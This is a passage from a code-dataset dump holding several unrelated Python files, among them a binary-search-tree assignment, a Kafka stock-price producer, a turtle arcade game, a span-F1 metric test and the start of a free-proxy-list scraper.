return_string=True, return_raw=False): # pragma: no cover\n new_docs = []\n counter = 0\n for doc in self.data:\n counter += 1\n self.update('Lemmatizing', counter)\n new_doc = doc.lemmatize(\n return_string=return_string,\n return_raw=return_raw,\n )\n new_docs.append(new_doc)\n self.update(None, None)\n return self.__class__(new_docs, **self.settings)\n\n def scansion(self): # pragma: no cover\n new_docs = []\n counter = 0\n for doc in self.data:\n counter += 1\n self.update('Performing Scansion', counter)\n new_docs.append(doc.scansion())\n self.update(None, None)\n return new_docs\n\n def entities(self):\n new_docs = []\n counter = 0\n for doc in self.data:\n counter += 1\n self.update('Scanning entities', counter)\n new_docs.append(doc.entities())\n self.update(None, None)\n return new_docs\n","sub_path":"build/lib/arakhne/corpus/cltk_corpus.py","file_name":"cltk_corpus.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"576360488","text":"# File: a6q3.py\n# Author: Jesse Ponugoti\n# NSID: vip670\n# Student ID: 11220274\n# Course: CMPT 145 L12\n\n# CMPT 145: Primitive Binary Search Trees\n# Defines functions for primitive Binary Search Tree data structure\n#\n# A Primitive Binary Tree is defined as follows:\n# 1. The value None is a primitive binary tree;\n# None is an empty tree.\n# 2. If lt and rt are primitive binary trees, and d is any value\n# treenode.create(d, lt, rt) is a primitive binary tree.\n\n# A Primitive Binary Tree t satisfies the Binary Search Tree property\n# if all of the following hold:\n# 1. The data value stored in t is greater than any data value in\n# t's left subtree (if any)\n# 2. The data value stored in t is less than any data value in\n# t's right subtree (if any)\n# 3. T's left subtree satisfies the BST property\n# 4. 
T's right subtree satisfies the BST property\n\nimport kvtreenode as kvtn\n\n\ndef member_prim(tnode, key):\n \"\"\"\n Check if key is stored in the binary search tree.\n Preconditions:\n :param tnode: a binary search tree\n :param key: a key\n Postconditions:\n If the key is not already in the tree, it is added to the tree\n :return: True if key is in the tree\n \"\"\"\n if tnode is None:\n return False\n else:\n ckey = kvtn.get_key(tnode)\n if ckey == key:\n # found the key\n return True\n elif key < ckey:\n # use the BST property\n return member_prim(kvtn.get_left(tnode), key)\n else:\n return member_prim(kvtn.get_right(tnode), key)\n\n\ndef insert_prim(tnode, key, value):\n \"\"\"\n Insert a new value into the binary tree.\n Preconditions:\n :param tnode: a binary search tree, created by create()\n :param value: a value\n Postconditions:\n If the value is not already in the tree, it is added to the tree\n Return\n :return: flag, tree\n Flag is True is insertion succeeded; tree is the tree with value in it\n Flag is False if the value is already in the tree, tree is returned unchanged\n \"\"\"\n\n if tnode is None:\n return True, kvtn.create(key, value)\n else:\n ckey = kvtn.get_key(tnode)\n if ckey == key:\n return False, tnode\n elif key < ckey:\n flag, subtree = insert_prim(kvtn.get_left(tnode), key)\n if flag:\n kvtn.set_left(tnode, subtree)\n return flag, tnode\n else:\n flag, subtree = insert_prim(kvtn.get_right(tnode), key)\n if flag:\n kvtn.set_right(tnode, subtree)\n return flag, tnode\n\n\ndef delete_prim_helper(node, value, is_left_node=None, parent=None):\n \"\"\"\n Helper function for delete_prim(tnode, value)\n Preconditions:\n :param tnode: a binary search tree, created by create()\n :param value: the value to delete from tnode\n :param is_left_node: is root the left node of parent?\n :param parent: the parent node of root\n Postconditions:\n If the value is in the tree, it is deleted.\n If the value is not there, there is no change to the tree.\n 
:return: True is the value was deleted, False otherwise\n \"\"\"\n def reconnect(root):\n def largest_node_lsub():\n # find the largest node in the left subtree\n largest = kvtn.get_right(lsub)\n if largest is None:\n return lsub\n while kvtn.get_right(largest) is not None:\n largest = kvtn.get_right(largest)\n return largest\n\n lsub = kvtn.get_left(root) # left subtree\n rsub = kvtn.get_right(root) # right subtree\n if lsub == None and rsub == None: # root has no children\n return None\n if lsub == None and rsub != None: # root has right subtree, but no left\n return rsub\n if lsub != None and rsub == None: # root has left subtree, but no right\n return lsub\n else: # root has two children\n # Attach the root's right child as the right child of the largest node\n # in the left subtree\n kvtn.set_right(largest_node_lsub(), rsub)\n return lsub\n\n if node is None:\n return False\n cval = kvtn.get_data(node)\n if value == cval:\n if is_left_node is None:\n tnode = None\n elif is_left_node:\n kvtn.set_left(parent, reconnect(node))\n else:\n kvtn.set_right(parent, reconnect(node))\n return True\n elif value < cval:\n return delete_prim_helper(kvtn.get_left(node), value, True, node)\n else:\n return delete_prim_helper(kvtn.get_right(node), value, False, node)\n\n\ndef delete_prim(tnode, value):\n \"\"\"\n Delete a value from the binary tree.\n Preconditions:\n :param tnode: a binary search tree, created by create()\n :param value: a value\n Postconditions:\n If the value is in the tree, it is deleted.\n If the value is not there, there is no change to the tree.\n Return:\n :return: (True, tnode) is the value was deleted, tree changed\n (False, tnode) otherwise (tnode unchanged)\n \"\"\"\n return delete_prim_helper(tnode, value), tnode\n\n\nif __name__ == '__main__':\n # define some functions to do unit testing on the primbst functions\n def unit_member(atree, value, expected, reason):\n \"\"\"\n Purpose: Test member_prim.\n Preconditions:\n :param atree: A primitive 
binary tree with the BST property\n :param value: A value to search for\n :param expected: The expected result of member_prim(atree,value)\n :param reason: A string about the reason for the test\n Return:\n :return: none\n \"\"\"\n flag = member_prim(atree, value)\n if flag is not expected:\n print(\"Unit Test error: member_prim returned:\", flag, reason)\n\n\n def unit_insert(atree, value, expected, reason):\n \"\"\"\n Purpose: Test insert_prim.\n Preconditions:\n :param atree: A primitive binary tree with the BST property\n :param value: A value to insert into the tree\n :param expected: The expected result of insert_prim(atree,value)\n :param reason: A string about the reason for the test\n Return:\n :return: none\n \"\"\"\n flag, result = insert_prim(atree, value)\n if flag is not expected:\n print(\"Unit Test error: insert_prim returned:\", flag, reason)\n\n\n def unit_delete(atree, value, expected, reason):\n \"\"\"\n Purpose: Test delete_prim.\n Preconditions:\n :param atree: A primitive binary tree with the BST property\n :param value: A value to delete\n :param expected: The expected result of delete_prim(atree,value)\n :param reason: A string about the reason for the test\n Return:\n :return: none\n \"\"\"\n flag, result = delete_prim(atree, value)\n if flag is not expected:\n print(\"Unit Test error: delete_prim returned:\", flag, reason)\n\n\n #################################################\n # unit test all functions\n\n def small_tree():\n return kvtn.create(1)\n\n\n def three_tree():\n return kvtn.create(10, kvtn.create(5), kvtn.create(15))\n\n # member\n unit_member(None, 1, False, 'on empty tree')\n unit_member(small_tree(), 1, True, 'on one node tree containing data value')\n unit_member(small_tree(), 2, False, 'on one node tree not containing data value')\n unit_member(three_tree(), 1, False, 'on three node tree without data value')\n unit_member(three_tree(), 7, False, 'on three node tree without data value')\n unit_member(three_tree(), 12, 
False, 'on three node tree without data value')\n unit_member(three_tree(), 17, False, 'on three node tree without data value')\n unit_member(three_tree(), 5, True, 'on three node tree containing data value')\n unit_member(three_tree(), 10, True, 'on three node tree containing data value')\n unit_member(three_tree(), 15, True, 'on three node tree containing data value')\n\n # insert\n unit_insert(None, 1, True, 'inserting into empty tree')\n unit_insert(small_tree(), 1, False, 'on one node tree containing data value')\n unit_insert(small_tree(), 0, True, 'on one node tree not containing data value (left insert)')\n unit_insert(small_tree(), 2, True, 'on one node tree not containing data value (right insert)')\n unit_insert(three_tree(), 7, True, 'inserting into three node tree without data')\n unit_insert(three_tree(), 12, True, 'inserting into three node tree without data')\n unit_insert(three_tree(), 17, True, 'inserting into three node tree without data')\n unit_insert(three_tree(), 5, False, 'inserting into three node tree with data')\n unit_insert(three_tree(), 10, False, 'inserting into three node tree with data')\n unit_insert(three_tree(), 15, False, 'inserting into three node tree with data')\n\n # delete\n unit_delete(None, 1, False, 'on empty tree')\n unit_delete(small_tree(), 5, False, 'on tree without data value')\n unit_delete(small_tree(), 1, True, 'on tree with data value')\n unit_delete(three_tree(), 1, False, 'deleting from three node tree without data value')\n unit_delete(three_tree(), 7, False, 'deleting from three node tree without data value')\n unit_delete(three_tree(), 12, False, 'deleting from three node tree without data value')\n unit_delete(three_tree(), 17, False, 'deleting from three node tree without data value')\n unit_delete(three_tree(), 5, True, 'deleting from three node tree with data value')\n unit_delete(three_tree(), 10, True, 'deleting from three node tree with data value')\n unit_delete(three_tree(), 15, True, 'deleting 
from three node tree with data value')\n\n\n def integration(unique, unknown, deleted, retained):\n \"\"\"\n Purpose: To test the integration of member, insert, delete.\n Preconditions:\n :param unique: A list of unique values to insert into a tree\n :param unknown: A list of values not in the tree\n :param deleted: A list of values to be deleted\n :param retained: A list of values that should still be in the tree at the end\n Return:\n :return: none\n \"\"\"\n # start with an empty primitive tree\n atree = None\n\n # add all the unique values\n for v in unique:\n # first, the value should not already be in the tree\n fm = member_prim(atree, v)\n if fm:\n print(\"Integration Test error: member_prim returned:\", fm, 'unique value', v, 'already in tree')\n\n # now the value gets inserted\n fi, atree = insert_prim(atree, v)\n if not fi:\n print(\"Integration Test error: insert_prim returned:\", fi, 'unique value', v, 'already inserted')\n\n # after insert, the value should be there\n fm = member_prim(atree, v)\n if not fm:\n print(\"Integration Test error: member_prim returned:\", fm, 'unique value', v,\n 'inserted but not in tree')\n\n # check them all after all the insertions are done\n for v in unique:\n fm = member_prim(atree, v)\n if not fm:\n print(\"Integration Test error: member_prim returned:\", fm, 'unique value', v,\n 'inserted but not in tree')\n\n # check unknown values\n for v in unknown:\n # first check that member can't find it\n fm = member_prim(atree, v)\n if fm:\n print(\"Integration Test error: member_prim returned:\", fm, 'unknown value', v, 'found in tree')\n\n # now check that delete can't delete it\n fd, atree = delete_prim(atree, v)\n if fd:\n print(\"Integration Test error: delete_prim returned:\", fd, 'deleting unknown value', v)\n\n # delete a bunch of values that should be in the tree by now\n for v in deleted:\n # first check they are there\n fm = member_prim(atree, v)\n if not fm:\n print(\"Integration Test error: member_prim 
returned:\", fm, 'deleting value', v, 'not found in tree')\n\n # now delete it\n fd, atree = delete_prim(atree, v)\n if not fd:\n print(\"Integration Test error: delete_prim returned:\", fd, 'deleting value', v, 'failed')\n\n # now check that member can't find it anymore\n fm = member_prim(atree, v)\n if fm:\n print(\"Integration Test error: member_prim returned:\", fm, 'deleted value', v, 'found in tree')\n\n # last, check those that should be remaining\n for v in retained:\n fm = member_prim(atree, v)\n if not fm:\n print(\"Integration Test error: member_prim returned:\", fm, 'retained value', v, 'not in tree')\n\n\n # integration testing\n integration([1, 2], [4], [1], [2])\n integration([1, 2], [4], [1, 2], [])\n integration([2, 1, 3], [4], [1, 2, 3], [])\n integration([10, 5, 15, 3, 6, 9, 12, 17], [4, 2, -1], [10, 5, 15, 3, 6, 9, 12, 17], [])\n integration(sorted([10, 5, 15, 3, 6, 9, 12, 17]), [4, 2, -1], [10, 5, 15, 3, 6, 9, 12, 17], [])\n integration([10, 5, 15, 3, 6, 9, 12, 17], [4, 2, -1], sorted([10, 5, 15, 3, 6, 9, 12, 17]), [])\n integration(reversed([10, 5, 15, 3, 6, 9, 12, 17]), [4, 2, -1], [10, 5, 15, 3, 6, 9, 12, 17], [])\n integration(reversed(sorted([10, 5, 15, 3, 6, 9, 12, 17])), [4, 2, -1], reversed([10, 5, 15, 3, 6, 9, 12, 17]), [])\n\n import random as rand\n\n limit = 10000\n many = 20\n first = many // 5\n second = 2 * first\n third = 3 * first\n fourth = 4 * first\n data = rand.sample(range(-limit, limit), many)\n\n integration(data[:third], data[third:fourth], data[first:second], data[:first])\n integration(sorted(data[:third]), data[third:fourth], data[first:second], data[:first])\n integration(data[:third], data[third:fourth], sorted(data[first:second]), data[:first])\n","sub_path":"assignments/a6/a6q3.py","file_name":"a6q3.py","file_ext":"py","file_size_in_byte":14135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"95857392","text":"\"\"\"\n-to-TOSCA 
Template\n--------------------------------------\nCreate a complete TOSCA template from some config file using specialised adaptors\n\nSome key terminology:\n * Config file - The configuration file which should be translated into TOSCA\n * Base TOSCA Template - The working, mostly complete TOSCA with placeholders\n formatted as in place of values needing replacing\n\"\"\"\nimport importlib\nimport os\n\nfrom .settings import ADAPTOR_IMPORT_PATH, NEW_TOSCA_PATH\n\ndef adaptor_init(adaptor_import_path):\n \"\"\" Initialise the adaptor\n\n Import and returns the class provided by ADAPTOR_IMPORT_PATH in settings.py\n \"\"\"\n\n # Separate the class from the end of the import path\n adaptor_module, adaptor_class = os.path.splitext(adaptor_import_path)\n\n # Try to import the module and return the class\n try:\n module = importlib.import_module(adaptor_module)\n adaptor = getattr(module, adaptor_class.strip('.'))\n except (ImportError, AttributeError):\n raise\n else:\n return adaptor()\n\ndef write_new_tosca(base_tosca_path, new_tosca_path, fields_to_replace):\n \"\"\" Create the newly filled TOSCA template\n\n Find placeholders in the base TOSCA template and replace them with new\n values provided by the adaptor having parsed the proprietary config file\n \"\"\"\n errors = False\n\n # Open a pair of files (in/out)\n with open(new_tosca_path, 'w') as output_file:\n with open(base_tosca_path) as input_file:\n\n # Make replacements based on the dictionary generated by adaptor\n for line in input_file:\n for placeholder, value in fields_to_replace.items():\n\n # Handle lists, dicts and empty keys\n if isinstance(value, (list, dict, int, float)):\n value = str(value)\n elif not isinstance(value, str):\n errors = True\n value = \"!KEYNOTFOUND\"\n\n # Replace and write\n line = line.replace(\"<{}>\".format(placeholder), value)\n output_file.write(line)\n\n # Append a \"log\" to the end of the generated TOSCA\n output_file.write(\"\\n# This TOSCA template has been filled 
automatically\")\n if errors:\n output_file.write(\"\\n# WARNING: placeholders not filled\"\n \"\\n# !KEYNOTFOUND error - check your adaptor/TOSCA\")\n\n\n\nclass Template():\n \"\"\" The Template class\n\n Instantiate an adaptor and call its translate() method. Use the returned\n dictionary to make replacements to the \"base TOSCA template\" defined\n by the adaptor. Write a new TOSCA template to file.\n\n :param string path_to_config_file: Path to the file to translate into TOSCA\n\n \"\"\"\n\n def __init__(self, path_or_data, manual_entries=None):\n \"\"\" Get the substitution dictionary \"\"\"\n\n self.tosca_out = NEW_TOSCA_PATH\n adaptor_import_path = ADAPTOR_IMPORT_PATH\n\n adaptor = adaptor_init(adaptor_import_path)\n self.base_tosca_path = adaptor.base_tosca_path\n self.fields_to_replace = adaptor.translate(path_or_data)\n\n if isinstance(manual_entries, dict):\n self.fields_to_replace.update(manual_entries)\n\n def maketosca(self, tosca_out=None):\n \"\"\" Write the template out to a file \"\"\"\n if tosca_out:\n self.tosca_out = tosca_out\n write_new_tosca(self.base_tosca_path, self.tosca_out, self.fields_to_replace)\n","sub_path":"totosca/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":3511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"647509908","text":"import yfinance as yf\r\nimport time\r\nimport pandas as pd\r\nfrom kafka import KafkaProducer\r\nfrom json import dumps\r\n\r\ndef kafka_producer():\r\n producer = KafkaProducer(bootstrap_servers=['54.196.246.52:9115'], # change ip and port number here\r\n value_serializer=lambda x:\r\n dumps(x).encode('utf-8'))\r\n\r\n tickers = [\"AAPL\", \"GOOGL\", \"AMZN\"]\r\n\r\n t_end = time.time() + 60 * 1 # Amount of time data is sent for in seconds\r\n data_frames = [] # Create a list to store DataFrames\r\n while time.time() < t_end:\r\n data = []\r\n for ticker in tickers:\r\n stock = yf.Ticker(ticker)\r\n quote = 
stock.info\r\n new_row = {\r\n \"Name\": ticker,\r\n \"Price\": quote[\"regularMarketOpen\"],\r\n \"Timestamp\": time.time()\r\n }\r\n data.append(new_row)\r\n df_stream = pd.DataFrame(data)\r\n data_frames.append(df_stream) # Append each DataFrame to the list\r\n producer.send('StockData', value=df_stream.to_json(orient='records')) # Send the DataFrame as JSON\r\n # Concatenate all DataFrames before exiting the loop\r\n final_df = pd.concat(data_frames, ignore_index=True)\r\n print(final_df)\r\n print(\"done producing\")\r\n\r\nkafka_producer()\r\n","sub_path":"ECE5984-SS Data Engineering Project/Project/produce.py","file_name":"produce.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"344015236","text":"#from Benchmark import *\n\nCONTRACT_SIZE_DICT = {'IC': 200, 'IF': 300, 'IH': 300}\nINDEX_ID_DICT = {'IC': 'SH000905', 'IF': 'SH000300', 'IH': 'SH000016'}\n\nmain_future_id_dict = {}\nclose_price_df_dict_from_TS = {}\nfuture_settlment_dict_from_TS = {}\nall_stock_id_list = []\n\nhistory_values_series = {}\n\n\nclass Computed_Trading_Days:\n computed_last_days = '2000-01-01'\n trading_days = set() # 保存查询到的结果\n\nrt_prices = {}\ncurrent_value_sum = 0.0\nstockPositionValueSeries = []\noneMinPricesDict = {}\ntodayOneMinPricesDict = {}\nstock_id_name_map = {}\n\n#benchmark_IC = BenchmarkIndexIC_Future()\n#benchmark_IF = BenchmarkIndexIF_Future()\n#benchmark_IH = BenchmarkIndexIH_Future()\n#benchmark_IC_realtime = BenchmarkIndexIC_Future(history=False)\n#benchmark_IF_realtime = BenchmarkIndexIF_Future(history=False)\n#benchmark_IH_realtime = BenchmarkIndexIH_Future(history=False)\n#\n#index_IC = BenchmarkIndexIC()\n#index_IF = BenchmarkIndexIF()\n#index_IH = BenchmarkIndexIH()\n#\n#index_IC_realtime = BenchmarkIndexIC(history=False)\n#index_IF_realtime = BenchmarkIndexIF(history=False)\n#index_IH_realtime = BenchmarkIndexIH(history=False)\n\n\n\n \n 
","sub_path":"src/GlobalVars.py","file_name":"GlobalVars.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"48592772","text":"# encoding: utf-8\n\"\"\"\n@author: Yuxian Meng\n@contact: yuxian_meng@shannonai.com\n\n@version: 1.0\n@file: test_span_f1\n@time: 2019/11/19 16:38\n\n 这一行开始写关于本文件的说明与解释\n\"\"\"\n\nfrom typing import List, Dict\nfrom bert_ner.metrics.span_f1 import mask_span_f1\nimport numpy as np\n\n\ndef test_span_f1():\n \"\"\"test span f1\"\"\"\n batch_preds = [[0, 1, 2, 0, 0]]\n batch_labels = [[0, 1, 2, 0, 3]]\n batch_masks = None\n label_list: List[str] = [\"O\", \"B-I\", \"E-I\", \"S-P\"]\n\n # all tags\n span_f1 = mask_span_f1(batch_preds=batch_preds, batch_labels=batch_labels,\n batch_masks=batch_masks, label_list=label_list)\n\n golden = {'span-precision': 1.0,\n 'span-recall ': 0.5,\n 'span-f1': 2/3}\n\n assert dict_equal(span_f1, golden)\n\n # specific tags\n span_f1 = mask_span_f1(batch_preds=batch_preds, batch_labels=batch_labels,\n batch_masks=batch_masks, label_list=label_list,\n specific_tags=[\"I\"])\n golden = {'span-precision': 1.0,\n 'span-recall ': 1.0,\n 'span-f1': 1.0}\n assert dict_equal(span_f1, golden)\n\n\ndef dict_equal(dic1: Dict, dic2: Dict) -> bool:\n \"\"\"compare two dicts\"\"\"\n dic1_keys = set(dic1.keys())\n dic2_keys = set(dic2.keys())\n if dic1_keys != dic2_keys:\n return False\n dic1_lst = []\n dic2_lst = []\n for key in dic1_keys:\n dic1_lst.append(dic1[key])\n dic2_lst.append(dic2[key])\n if np.allclose(np.array(dic1_lst), np.array(dic2_lst)):\n return True\n return False\n","sub_path":"tests/metrics/test_span_f1.py","file_name":"test_span_f1.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"368145569","text":"import os\nimport random\nimport turtle\nimport time\n#import subprocess\n\n#quickfart = 
\"/Users/tlg/Documents/spaceWar/quickfart.wav\"\nlevel = 1\n\nturtle.fd(0)\nturtle.speed(0)\nturtle.bgcolor(\"black\")\nturtle.title(\"SpaceWar\")\n#turtle.bgpic(\"space.gif\")\nturtle.ht()\nturtle.setundobuffer(1)\n\nturtle.tracer(0)\n\nturtle.register_shape(\"dad.gif\")\n\nenemyShape = \"circle\"\n\n\nclass Sprite(turtle.Turtle):\n def __init__(self, spriteshape, color, startx, starty):\n turtle.Turtle.__init__(self, shape = spriteshape)\n self.speed(0)\n self.penup()\n self.color(color)\n self.fd(0)\n self.goto(startx, starty)\n self.speed = 1\n\n def move(self):\n self.fd(self.speed)\n \n #boundary detection\n if self.xcor() > 290:\n self.setx(290)\n self.rt(60)\n if self.xcor() < -290:\n self.setx(-290)\n self.rt(60)\n if self.ycor() > 290:\n self.sety(290)\n self.rt(60)\n if self.ycor() < -290:\n self.sety(-290)\n self.rt(60)\n\n #check sprite collision\n def is_collision(self, other):\n if (self.xcor() >= (other.xcor() - 20)) and \\\n (self.xcor() <= (other.xcor() + 20)) and \\\n (self.ycor() >= (other.ycor() - 20)) and \\\n (self.ycor() <= (other.ycor() + 20)):\n return True\n else:\n return False\n\n \n\nclass Player(Sprite):\n def __init__(self, spriteshape, color, startx, starty):\n Sprite.__init__(self, spriteshape, color, startx, starty)\n self.shapesize(stretch_wid=0.6, stretch_len=1.1, outline=None)\n self.speed = 4\n self.lives = 3\n\n\n def turn_left(self):\n self.lt(20)\n \n def turn_right(self):\n self.rt(20)\n\n def accelerate(self):\n self.speed += 1\n\n def decelerate(self):\n self.speed -= 1\n\nclass Enemy(Sprite):\n def __init__(self, spriteshape, color, startx, starty):\n Sprite.__init__(self, spriteshape, color, startx, starty)\n self.speed = 6\n self.setheading(random.randint(0, 360))\n\nclass Ally(Sprite):\n def __init__(self, spriteshape, color, startx, starty):\n Sprite.__init__(self, spriteshape, color, startx, starty)\n self.speed = 8\n self.setheading(random.randint(0, 360))\n\n def move(self):\n self.fd(self.speed)\n \n #boundary 
detection\n if self.xcor() > 290:\n self.setx(290)\n self.lt(60)\n if self.xcor() < -290:\n self.setx(-290)\n self.lt(60)\n if self.ycor() > 290:\n self.sety(290)\n self.lt(60)\n if self.ycor() < -290:\n self.sety(-290)\n self.lt(60)\n \nclass Missile(Sprite):\n def __init__(self, spriteshape, color, startx, starty):\n Sprite.__init__(self, spriteshape, color, startx, starty)\n self.shapesize(stretch_wid = 0.2, stretch_len = 0.4, outline=None)\n self.speed = 20\n self.status = \"ready\"\n #self.goto(-1000, 1000)\n \n\n def fire(self):\n if self.status == \"ready\":\n #subprocess.call([\"afplay\", \"/Users/tlg/Documents/spaceWar/quickfart.wav\"])\n #os.system(\" afplay /Users/tlg/Documents/spaceWar/quickfart.wav$\")\n self.goto(player.xcor(), player.ycor())\n self.setheading(player.heading())\n self.status = \"firing\"\n\n def move(self):\n if self.status == \"ready\":\n self.goto(1000, -1000)\n \n \n if self.status == \"firing\":\n self.fd(self.speed)\n\n #border check\n \n if self.xcor() > 290 or self.xcor() < -290 or\\\n self.ycor() > 290 or self.ycor() < -290:\n #self.goto(-1000, 1000)\n self.status = \"ready\"\n\nclass Particle(Sprite):\n def __init__(self, spriteshape, color, startx, starty):\n Sprite.__init__(self, spriteshape, color, startx, starty)\n self.shapesize(stretch_wid = 0.1, stretch_len = 0.1, outline=None)\n self.goto(-1000,-1000)\n self.frame = 0\n\n def explode(self, startx, starty):\n self.goto(startx, starty)\n self.setheading(random.randint(0, 360))\n self.frame = 1\n\n def move(self):\n if self.frame > 0:\n self.fd(10)\n self.frame += 1\n if self.frame > 50:\n self.frame = 0\n self.goto(-1000, -1000)\n if self.xcor() > 290 or self.xcor() < -290 or\\\n self.ycor() > 290 or self.ycor() < -290:\n #self.goto(-1000, 1000)\n self.lt(random.randint(0, 270))\n\nclass Trail(Sprite):\n def __init__(self, spriteshape, color, startx, starty):\n Sprite.__init__(self, spriteshape, color, startx, starty)\n self.shapesize(stretch_wid = 0.1, stretch_len = 
0.1, outline=None)\n self.goto(-1000,-1000)\n self.state = \"find\"\n self.frame = 0\n \n\n def follow(self, other):\n if self.state == \"find\":\n self.state = \"freeze\"\n self.setheading(player.heading() - 178 + random.randint(0, 4))\n x = other.xcor()\n y = other.ycor()\n self.goto(x, y)\n \n \n \n if self.state == \"freeze\":\n self.fd(random.randint(1, 10))\n self.frame += 1\n if self.frame > 10:\n self.state = \"find\"\n self.frame = 0\n self.goto(-1000, -1000)\n \n \n \nclass Game():\n def __init__(self):\n self.level = 1\n self.score = 0\n self.state = \"playing\"\n self.pen = turtle.Turtle()\n self.lives = 3\n\n def draw_border(self):\n #draw border\n self.pen.speed(0)\n self.pen.color(\"white\")\n self.pen.pensize(3)\n self.pen.penup()\n self.pen.goto(-300, 300)\n self.pen.pendown()\n for side in range(4):\n self.pen.fd(600)\n self.pen.rt(90)\n self.pen.penup()\n self.pen.ht()\n self.pen.pendown()\n\n def show_status(self):\n if self.score >= 500:\n self.level = 2\n self.pen.undo()\n msg = \"Score: %s Level: %s\" %(self.score, self.level)\n self.pen.penup()\n self.pen.goto(-300, 310)\n self.pen.write(msg, font=(\"Arial\", 16, \"normal\"))\n\n\n\n#create game object\ngame = Game()\n\n#draw the game border\ngame.draw_border()\n\n#show game status\ngame.show_status()\n\n\n#create my sprites\nplayer = Player(\"triangle\", \"white\", 0, 0)\n\n#enemy = Enemy(\"circle\", \"red\", 100, 100)\n\nmissile = Missile(\"triangle\", \"yellow\", 1000, -1000)\n\n# ally = Ally(\"square\", \"blue\", 0, 0)\ntrails = []\nfor trail in range(20):\n trails.append(Trail(\"circle\", \"grey\", -1000, -1000))\n\nallies = []\nfor i in range(6):\n allies.append(Ally(\"square\", \"blue\", -100, -100))\n\nenemies = []\nif game.level == 1:\n for i in range(6):\n enemies.append(Enemy(\"circle\", \"red\", 100, 100))\n \nparticles = []\nfor i in range(20):\n particles.append(Particle(\"circle\", \"orange\", 0, 0))\n\n\n#keyboard bindings\nturtle.onkey(player.turn_left, 
\"Left\")\nturtle.onkey(player.turn_right, \"Right\")\nturtle.onkey(player.accelerate, \"Up\")\nturtle.onkey(player.decelerate, \"Down\")\nturtle.onkey(missile.fire, \"space\")\nturtle.listen()\n\n\n#main game loop\nwhile True:\n if game.level == 1:\n gamespeed = 0.05\n if game.level == 2:\n gamespeed = 0.03\n turtle.update()\n time.sleep(gamespeed)\n\n # enemy.move()\n player.move()\n missile.move()\n # ally.move()\n\n for trail in trails:\n trail.follow(player)\n \n \n \n for particle in particles:\n particle.move()\n \n for ally in allies:\n ally.move()\n if missile.is_collision(ally):\n x = random.randint(-250, 250)\n y = random.randint(-250, 250)\n ally.goto(x, y)\n missile.status = \"ready\"\n ally.setheading(random.randint(0, 360))\n #decrease score\n game.score -= 50\n game.show_status()\n \n for enemy in enemies:\n enemy.move()\n \n #check for collision\n if player.is_collision(enemy):\n \n x = random.randint(-250, 250)\n y = random.randint(-250, 250)\n player.goto(x, y)\n player.setheading(random.randint(0, 360))\n game.score -= 100\n game.show_status()\n\n if missile.is_collision(enemy):\n x = random.randint(-250, 250)\n y = random.randint(-250, 250)\n enemy.goto(x, y)\n missile.status = \"ready\"\n enemy.setheading(random.randint(0, 360))\n #increase score\n game.score += 100\n game.show_status()\n\n for particle in particles:\n particle.explode(missile.xcor(), missile.ycor())\n \n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"pythonPractice/spaceWar/spaceWar.py","file_name":"spaceWar.py","file_ext":"py","file_size_in_byte":8994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"460663386","text":"from django.contrib import admin\nfrom django.urls import path,include\nadmin.site.site_header=\"Code Hospital DataBase\"\nadmin.site.site_title=\"ravan database\"\nadmin.site.index_title=\"Hello Aman Welcome Missing You\"\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n 
path('',include('priceprediction.urls'))\n]\n","sub_path":"djangoportion/housing/housing/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"157839806","text":"import json\nimport re\nfrom datetime import datetime, date, timedelta\nfrom .utils import get_page\nfrom pyquery import PyQuery as pq\nfrom scrapy import Selector\n\n\nclass ProxyMetaclass(type):\n def __new__(cls, name, bases, attrs):\n count = 0\n attrs['__CrawlFunc__'] = []\n for k, v in attrs.items():\n if k.partition('_')[-1] in ['ip3366', 'daili66', 'iphai', 'xicidaili']:\n continue\n if 'crawl_' in k:\n attrs['__CrawlFunc__'].append(k)\n count += 1\n attrs['__CrawlFuncCount__'] = count\n return type.__new__(cls, name, bases, attrs)\n\n\nclass Crawler(object, metaclass=ProxyMetaclass):\n def get_proxies(self, callback):\n proxies = []\n for proxy in eval(\"self.{}()\".format(callback)):\n # print(type(proxy))\n if isinstance(proxy, list):\n for pro in proxy:\n print('成功获取到代理list', pro)\n proxies.append(pro)\n elif isinstance(proxy, str):\n print('成功获取到代理str', proxy)\n proxies.append(proxy)\n\n return proxies\n \n def crawl_daili66(self, page_count=4):\n \"\"\"\n 获取代理66\n 此网站已停止维护——20201216\n :param page_count: 页码\n :return: 代理\n \"\"\"\n start_url = 'http://www.66ip.cn/{}.html'\n urls = [start_url.format(page) for page in range(1, page_count + 1)]\n for url in urls:\n print('Crawling', url)\n html = get_page(url)\n if html:\n doc = pq(html)\n trs = doc('.containerbox table tr:gt(0)').items()\n for tr in trs:\n ip = tr.find('td:nth-child(1)').text()\n port = tr.find('td:nth-child(2)').text()\n yield ':'.join([ip, port])\n\n # def crawl_ip3366(self):\n # for page in range(1, 4):\n # start_url = 'http://www.ip3366.net/free/?stype=1&page={}'.format(page)\n # html = get_page(start_url)\n # ip_address = re.compile('\\s*(.*?)\\s*(.*?)')\n # # \\s * 匹配空格,起到换行作用\n # re_ip_address = 
